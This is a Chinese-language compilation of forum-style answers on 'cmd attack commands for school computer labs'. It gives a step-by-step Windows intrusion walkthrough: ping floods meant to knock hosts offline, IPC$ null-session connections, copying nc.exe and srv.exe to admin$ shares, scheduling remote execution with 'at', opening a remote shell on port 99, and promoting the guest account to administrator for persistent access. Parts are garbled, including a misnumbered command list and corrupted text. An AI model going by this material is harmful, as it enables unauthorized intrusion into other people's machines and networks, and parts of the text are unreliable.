學校機房cmd攻擊命令

㈠ CMD命令使用方法

CMD命令使用方法

熟練掌握CMD命令，只對我們有好處，沒有壞處。CMD命令包含Windows系統的所有CMD命令，學好CMD命令不僅在工作中對我們很有作用，而且在日常生活中也給我們帶來了很大的幫助。那CMD命令如何使用?下面就和大家分享一下掌握CMD命令的方法。

CMD命令如下：

一，ping

它是用來檢查網路是否通暢或者網路連接速度的命令。作為一個生活在網路上的管理員或者黑客來說，ping命令是第一個必須掌握的DOS命令，它所利用的原理是這樣的：網路上的機器都有唯一確定的IP地址，我們給目標IP地址發送一個數據包，對方就要返回一個同樣大小的數據包，根據返回的數據包我們可以確定目標主機的存在，可以初步判斷目標主機的操作系統等。下面就來看看它的一些常用的操作。先看看幫助吧，在DOS窗口中鍵入：ping /? 回車，。所示的幫助畫面。在此，我們只掌握一些基本的很有用的參數就可以了(下同)。

-t 表示將不間斷向目標IP發送數據包，直到我們強迫其停止。試想，如果你使用100M的寬頻接入，而目標IP是56K的小貓，那麼要不了多久，目標IP就因為承受不了這么多的數據而掉線，呵呵，一次攻擊就這么簡單的實現了。

-l 定義發送數據包的大小，默認為32位元組，我們利用它可以最大定義到65500位元組。結合上面介紹的-t參數一起使用，會有更好的效果哦。

-n 定義向目標IP發送數據包的次數，默認為3次。如果網路速度比較慢，3次對我們來說也浪費了不少時間，因為現在我們的目的僅僅是判斷目標IP是否存在，那麼就定義為一次吧。

說明一下，如果-t 參數和 -n參數一起使用，ping命令就以放在後面的參數為標准，比如“ping IP -t -n 3”，雖然使用了-t參數，但並不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主機域名，這樣就可以得到主機的IP。

下面我們舉個例子來說明一下具體用法。

這里time=2表示從發出數據包到接受到返回數據包所用的時間是2秒，從這里可以判斷網路連接速度的大小。從TTL的返回值可以初步判斷被ping主機的操作系統，之所以說“初步判斷”是因為這個值是可以修改的。這里TTL=32表示操作系統可能是 win98。

(小知識：如果TTL=128，則表示目標主機可能是Win2000;如果TTL=250，則目標主機可能是Unix)

至於利用ping命令可以快速查找區域網故障，可以快速搜索最快的QQ伺服器，可以對別人進行ping攻擊……這些就靠大家自己發揮了。

二，nbtstat

該命令使用TCP/IP上的NetBIOS顯示協議統計和當前TCP/IP連接，使用這個命令你可以得到遠程主機的NETBIOS信息，比如用戶名、所屬的工作組、網卡的MAC地址等。在此我們就有必要了解幾個基本的參數。

-a 使用這個參數，只要你知道了遠程主機的機器名稱，就可以得到它的NETBIOS信息(下同)。

-A 這個參數也可以得到遠程主機的NETBIOS信息，但需要你知道它的IP。

-n 列出本地機器的NETBIOS信息。

當得到了對方的IP或者機器名的時候，就可以使用nbtstat命令來進一步得到對方的信息了，這又增加了我們入侵的保險系數。

三，netstat

這是一個用來查看網路狀態的命令，操作簡便功能強大。

-a 查看本地機器的所有開放埠，可以有效發現和預防木馬，可以知道機器所開的服務等信息，如圖4。

這里可以看出本地機器開放有FTP服務、Telnet服務、郵件服務、WEB服務等。用法：netstat -a IP。

-r 列出當前的路由信息，告訴我們本地機器的網關、子網掩碼等信息。用法：netstat -r IP。

四，tracert

跟蹤路由信息，使用此命令可以查出數據從本地機器傳輸到目標主機所經過的所有途徑，這對我們了解網路布局和結構很有幫助。如圖5。

這里說明數據從本地機器傳輸到192.168.0.1的機器上，中間沒有經過任何中轉，說明這兩台機器是在同一段區域網內。用法：tracert IP。

五，net

這個命令是網路命令中最重要的一個，必須透徹掌握它的每一個子命令的用法，因為它的功能實在是太強大了，這簡直就是 微軟為我們提供的最好的入侵工具。首先讓我們來看一看它都有那些子命令，鍵入net /?回車如圖6。

在這里，我們重點掌握幾個入侵常用的子命令。

net view

使用此命令查看遠程主機的所以共享資源。命令格式為net view IP。

net use

把遠程主機的某個共享資源影射為本地盤符，圖形界面方便使用，呵呵。命令格式為net use x： IPsharename。上面一個表示把192.168.0.5IP的共享名為magic的目錄影射為本地的Z盤。下面表示和192.168.0.7 建立IPC$連接(net use IPIPC$ “password” /user：“name”)，

建立了IPC$連接後，呵呵，就可以上傳文件了： nc.exe 192.168.0.7admin$，表示把本地目錄下的nc.exe傳到遠程主機，結合後面要介紹到的其他DOS命令就可以實現入侵了。

net start

使用它來啟動遠程主機上的服務。當你和遠程主機建立連接後，如果發現它的什麼服務沒有啟動，而你又想利用此服務怎麼辦?就使用這個命令來啟動吧。用法：net start servername，如圖9，成功啟動了telnet服務。

net stop

入侵後發現遠程主機的某個服務礙手礙腳，怎麼辦?利用這個命令停掉就ok了，用法和net start同。

net user

查看和帳戶有關的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。這對我們入侵是很有利的，最重要的，它為我們克隆帳戶提供了前提。鍵入不帶參數的net user，可以查看所有用戶，包括已經禁用的。下面分別講解。

1，net user abcd 1234 /add，新建一個用戶名為abcd，密碼為1234的帳戶，默認為user組成員。

2，net user abcd /del，將用戶名為abcd的`用戶刪除。

3，net user abcd /active:no，將用戶名為abcd的用戶禁用。

4，net user abcd /active:yes，激活用戶名為abcd的用戶。

5，net user abcd，查看用戶名為abcd的用戶的情況

net localgroup

查看所有和用戶組有關的信息和進行相關操作。鍵入不帶參數的net localgroup即列出當前所有的用戶組。在入侵過程中，我們一般利用它來把某個帳戶提升為administrator組帳戶，這樣我們利用這個帳戶就可以控制整個遠程主機了。用法：net localgroup groupname username /add。

現在我們把剛才新建的用戶abcd加到administrator組里去了，這時候abcd用戶已經是超級管理員了，呵呵，你可以再使用net user abcd來查看他的狀態，和圖10進行比較就可以看出來。但這樣太明顯了，網管一看用戶情況就能漏出破綻，所以這種方法只能對付菜鳥網管，但我們還得知道。現在的手段都是利用其他工具和手段克隆一個讓網管看不出來的超級管理員，這是後話。有興趣的朋友可以參照《黑客防線》第30期上的《由淺入深解析隆帳戶》一文。

net time

這個命令可以查看遠程主機當前的時間。如果你的目標只是進入到遠程主機裡面，那麼也許就用不到這個命令了。但簡單的入侵成功了，難道只是看看嗎?我們需要進一步滲透。這就連遠程主機當前的時間都需要知道，因為利用時間和其他手段(後面會講到)可以實現某個命令和程序的定時啟動，為我們進一步入侵打好基礎。用法：net time IP。

六，at

這個命令的作用是安排在特定日期或時間執行某個特定的命令和程序(知道net time的重要了吧?)。當我們知道了遠程主機的當前時間，就可以利用此命令讓其在以後的某個時間(比如2分鍾後)執行某個程序和命令。用法：at time command computer。

表示在6點55分時，讓名稱為a-01的計算機開啟telnet服務(這里net start telnet即為開啟telnet服務的命令)。

七，ftp

大家對這個命令應該比較熟悉了吧?網路上開放的ftp的主機很多，其中很大一部分是匿名的，也就是說任何人都可以登陸上去。現在如果你掃到了一台開放 ftp服務的主機(一般都是開了21埠的機器)，如果你還不會使用ftp的命令怎麼辦?下面就給出基本的ftp命令使用方法。

首先在命令行鍵入ftp回車，出現ftp的提示符，這時候可以鍵入“help”來查看幫助(任何DOS命令都可以使用此方法查看其幫助)。

大家可能看到了，這么多命令該怎麼用?其實也用不到那麼多，掌握幾個基本的就夠了。

首先是登陸過程，這就要用到open了，直接在ftp的提示符下輸入“open 主機IP ftp埠”回車即可，一般埠默認都是21，可以不寫。接著就是輸入合法的用戶名和密碼進行登陸了，這里以匿名ftp為例介紹。

用戶名和密碼都是ftp，密碼是不顯示的。當提示**** logged in時，就說明登陸成功。這里因為是匿名登陸，所以用戶顯示為Anonymous。

接下來就要介紹具體命令的使用方法了。

dir 跟DOS命令一樣，用於查看伺服器的文件，直接敲上dir回車，就可以看到此ftp伺服器上的文件。

cd 進入某個文件夾。

get 下載文件到本地機器。

put 上傳文件到遠程伺服器。這就要看遠程ftp伺服器是否給了你可寫的許可權了，如果可以，呵呵，該怎麼 利用就不多說了，大家就自由發揮去吧。

delete 刪除遠程ftp伺服器上的文件。這也必須保證你有可寫的許可權。

bye 退出當前連接。

quit 同上。

八，telnet

功能強大的遠程登陸命令，幾乎所有的入侵者都喜歡用它，屢試不爽。為什麼?它操作簡單，如同使用自己的機器一樣，只要你熟悉DOS命令，在成功以 administrator身份連接了遠程機器後，就可以用它來干你想乾的一切了。下面介紹一下使用方法，首先鍵入telnet回車，再鍵入help查看其幫助信息。

然後在提示符下鍵入open IP回車，這時就出現了登陸窗口，讓你輸入合法的用戶名和密碼，這里輸入任何密碼都是不顯示的。

當輸入用戶名和密碼都正確後就成功建立了telnet連接，這時候你就在遠程主機上具有了和此用戶一樣的許可權，利用DOS命令就可以實現你想乾的事情了。這里我使用的超級管理員許可權登陸的。

到這里為止，網路DOS命令的介紹就告一段落了，這里介紹的目的只是給菜鳥網管一個印象，讓其知道熟悉和掌握網路DOS命令的重要性。其實和網路有關的DOS命令還遠不止這些，這里只是拋磚引玉，希望能對廣大菜鳥網管有所幫助。學好DOS對當好網管有很大的幫助，特別的熟練掌握了一些網路的DOS命令。

另外大家應該清楚，任何人要想進入系統，必須得有一個合法的用戶名和密碼(輸入法漏洞差不多絕跡了吧)，哪怕你拿到帳戶的只有一個很小的許可權，你也可以利用它來達到最後的目的。所以堅決消滅空口令，給自己的帳戶加上一個強壯的密碼，是最好的防禦弱口令入侵的方法。

㈡ 如何用CMD攻擊別人電腦

首先，電腦的系統要相同（這樣防火牆的等級相同）；
其次，所針對的電腦要在一個網域；
方法：
開始菜單—運行—輸入CMD—回車，然後在打開的命令提示符窗口中輸入：
shutdown -s -m \\ip地址 ，回車即可。
具體命令，參照：http://..com/question/1817633159546503908.html?fr=iks&word=cmd%B9%A5%BB%F7%C3%FC%C1%EE&ie=gbk

㈢ cmd斷網攻擊教程

1、點擊開始按鈕，輸入cmd，在出現的cmd.exe上右鍵選則以管理員身份運行

2、在命令行中輸入netsh i i show in

3、在命令行中輸入netsh -c 「i i」 add neighbors idx IP MAC進行ARP綁定

4、例如：上面的i i分別是1 和11，那麼，netsh -c i i add neighbors 11 192.168.16.139 00-1F-D0-66-2E-62，其中192.168.1.1是你的ip地址 D0-27-88-C9-7C-A4是物理地址，這兩個地址可以在網路連接上右鍵-狀態-詳細信息中隱旁查看

5、最後在命令行中輸入arp -a命令查看，剛才添加岩攜仔的ARP項是否在列表中，並且為靜態就可粗汪以了

㈣ 命令有哪些 黑客CMD Ping命令大全

1. gpedit.msc-----組策略
2. sndrec32-------錄音機
3. Nslookup-------IP地址偵測器 ，是一個 監測網路中 DNS 伺服器是否能正確實現域名解析的命令行工具。 它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中卻沒有集成這一個工具。
4. explorer-------打開資源管理器
5. logoff---------注銷命令
6. shutdown-------60秒倒計時關機命令
7. lusrmgr.msc----本機用戶和組
8. services.msc---本地服務設置
9. oobe/msoobe /a----檢查XP是否激活
10. notepad--------打開記事本
11. cleanmgr-------垃圾整理
12. net start messenger----開始信使服務
13. compmgmt.msc---計算機管理
14. net stop messenger-----停止信使服務
15. conf-----------啟動netmeeting
16. dvdplay--------DVD播放器
17. charmap--------啟動字元映射表
18. diskmgmt.msc---磁碟管理實用程序
19. calc-----------啟動計算器
20. dfrg.msc-------磁碟碎片整理程序
21. chkdsk.exe-----Chkdsk磁碟檢查
22. devmgmt.msc--- 設備管理器
23. regsvr32 /u *.dll----停止dll文件運行
24. drwtsn32------ 系統醫生
25. rononce -p----15秒關機
26. dxdiag---------檢查DirectX信息
27. regedt32-------注冊表編輯器
28. Msconfig.exe---系統配置實用程序
29. rsop.msc-------組策略結果集
30. mem.exe--------顯示內存使用情況
31. regedit.exe----注冊表
32. winchat--------XP自帶區域網聊天
33. progman--------程序管理器
34. winmsd---------系統信息
35. perfmon.msc----計算機性能監測程序
36. winver---------檢查Windows版本
37. sfc /scannow-----掃描錯誤並復原
38. taskmgr-----任務管理器（2000/xp/2003
40. wmimgmt.msc----打開windows管理體系結構(WMI)
41. wupdmgr--------windows更新程序
42. wscript--------windows腳本宿主設置
43. write----------寫字板
45. wiaacmgr-------掃描儀和照相機向導
46. winchat--------XP自帶區域網聊天
49. mplayer2-------簡易widnows media player
50. mspaint--------畫圖板
51. mstsc----------遠程桌面連接
53. magnify--------放大鏡實用程序
54. mmc------------打開控制台
55. mobsync--------同步命令
57. iexpress-------木馬捆綁工具，系統自帶
58. fsmgmt.msc-----共享文件夾管理器
59. utilman--------輔助工具管理器
61. dcomcnfg-------打開系統組件服務
62. ddeshare-------打開DDE共享設置
110. osk------------打開屏幕鍵盤
111. odbcad32-------ODBC數據源管理器
112. oobe/msoobe /a----檢查XP是否激活
68. ntbackup-------系統備份和還原
69. narrator-------屏幕「講述人」
70. ntmsmgr.msc----移動存儲管理器
71. ntmsoprq.msc---移動存儲管理員操作請求
72. netstat -an----(TC)命令檢查介面
73. syncapp--------創建一個公文包
74. sysedit--------系統配置編輯器
75. sigverif-------文件簽名驗證程序
76. ciadv.msc------索引服務程序
77. shrpubw--------創建共享文件夾
78. secpol.msc-----本地安全策略
79. syskey---------系統加密，一旦加密就不能解開，保護windows xp系統的雙重密碼
80. services.msc---本地服務設置
81. Sndvol32-------音量控製程序
82. sfc.exe--------系統文件檢查器
83. sfc /scannow---windows文件保護
84. ciadv.msc------索引服務程序
85. tourstart------xp簡介（安裝完成後出現的漫遊xp程序）
86. taskmgr--------任務管理器
87. eventvwr-------事件查看器
88. eudcedit-------造字程序
89. compmgmt.msc---計算機管理
90. packager-------對象包裝程序
91. perfmon.msc----計算機性能監測程序
92. charmap--------啟動字元映射表
93. cliconfg-------SQL SERVER 客戶端網路實用程序
94. Clipbrd--------剪貼板查看器
95. conf-----------啟動netmeeting
96. certmgr.msc----證書管理實用程序
97. regsvr32 /u *.dll----停止dll文件運行
98. regsvr32 /u zipfldr.dll------取消ZIP支持
99. cmd.exe--------CMD命令提示符

㈤ cmd攻擊別人電腦命令，

無法攻擊別人電腦，但是可以訪問別人電腦。

如下參考：

1.在桌面上,單擊「開始」,單擊「運行」。

㈥ 跪求cmd黑客攻擊指令和cmd電腦命令！懸賞大大滴有

一 相關命令
建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤，其他盤類推)
如果已經和目標建立了ipc$，則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
刪除一個ipc$連接
net use \\IP\ipc$ /del
刪除共享映射
net use c: /del 刪除映射的c盤，其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
提示:對於不熟悉命令行操作的朋友來說.建立ipc$連接後,可以在"我的電腦"或"網上鄰居"右鍵映射網路驅動器,效果一樣.
二 經典入侵模式
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators，密碼為"空"的IP地址(空口令?哇,運氣好到家了)，如果是打算攻擊的話，就可以用這樣的命令來與127.0.0.1建立一個連接，因為密碼為"空"，所以第一個引號處就不用輸入，後面一個雙引號里的是用戶名，輸入administrators，命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去，在流光的Tools目錄下就有（這里的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要復制到什麼地方去了）。
3. C:\>net time \\127.0.0.1
查查時間，發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00，命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧（這里設置的時間要比主機時間快，不然你怎麼啟動啊，呵呵！）
5. C:\>net time \\127.0.0.1
再查查到時間沒有？如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05，那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧，注意埠是99。Telnet默認的是23埠，但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet服務！這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上（ntlm.exe也是在《流光》的Tools目錄中）。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動（這里的C:\WINNT\system32>指的是對方計算機，運行ntlm其實是讓這個程序在對方計算機上運行）。當出現"DONE"的時候，就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務！
9.Telnet 127.0.0.1，接著輸入用戶名與密碼就進入對方了，操作就像在DOS上操作一樣簡單！(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改，guest帳號沒改變的話，下次我們可以用guest再次訪問這台計算機).
ipc$經典入侵步驟：
1、net use \\ip\ipc$ 密碼 /user:用戶名
2、 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 時間 命令
5、入侵成功，連接你的肉雞
常用的網路命令
net user 查看用戶列表
net user 用戶名 密碼 /add 添加用戶
net user 用戶名 密碼 更改用戶密碼
net localgroup administrators 用戶名 /add 添加用戶到管理組
net user 用戶名 /delete 刪除用戶
net user 用戶名 查看用戶的基本情況
net user 用戶名 /active:no 禁用該用戶
net user 用戶名 /active:yes 啟用該用戶
net share 查看計算機IPC$共享資源
net share 共享名 查看該共享的情況
net share 共享名=路徑 設置共享。例如 net share c$=c:
net share 共享名 /delete 刪除IPC$共享
net stop lanmanserver 關閉ipc$和默認共享依賴的服務
net use 查看IPC$連接情況
net use \\ip\ipc$ "密碼" /user:"用戶名" ipc$連接
net use \\ip\ipc$ /del 刪除一個連接
net use z: \\目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤
net use z: /del
net time \\ip 查看遠程計算機上的時間
路徑:\文件名 \\ip\共享名復制文件到已經ipc$連接的計算機上
net view ip 查看計算機上的共享資源
at 查看自己計算機上的計劃作業
at \\ip 查看遠程計算機上的計劃作業
at \\ip 時間 命令(注意加盤符) 在遠程計算機上加一個作業
at \\ip 計劃作業ID /delete 刪除遠程計算機上的一個計劃作業
at \\ip all /delete 刪除遠程計算機上的全部計劃作業
at \\ip time "echo 5 > c:\t.txt" 在遠程計算機上建立文本文件t.txt；

下面純手打，上面是度娘給的

taskkill /im 進程名 停止運行
tasklisy 查看運行進程
ipconfig 查看本機IP
md 創建文件夾
rd 刪除文件夾
echo off > .txt|exit 添加文本
echo 內容 >> .txt 給文本添加內容
復制文件
net user 用戶名 密碼/add 創建一個普通賬號
net localgroup administrators 用戶名 /add 把賬戶加入超級用戶組

㈦ 請問怎樣用CMD命令通過ip攻擊別人

cmd 攻擊一般都是區域網內攻擊 外網是DDOS攻擊 區域網內攻擊首先你得知道IP 攻擊可以使用PING包 PING死他 cmd -ping xxx.xxx.xxx.xxx 空格 -l 空格 -n 空格 65000s （X代表Ip地址)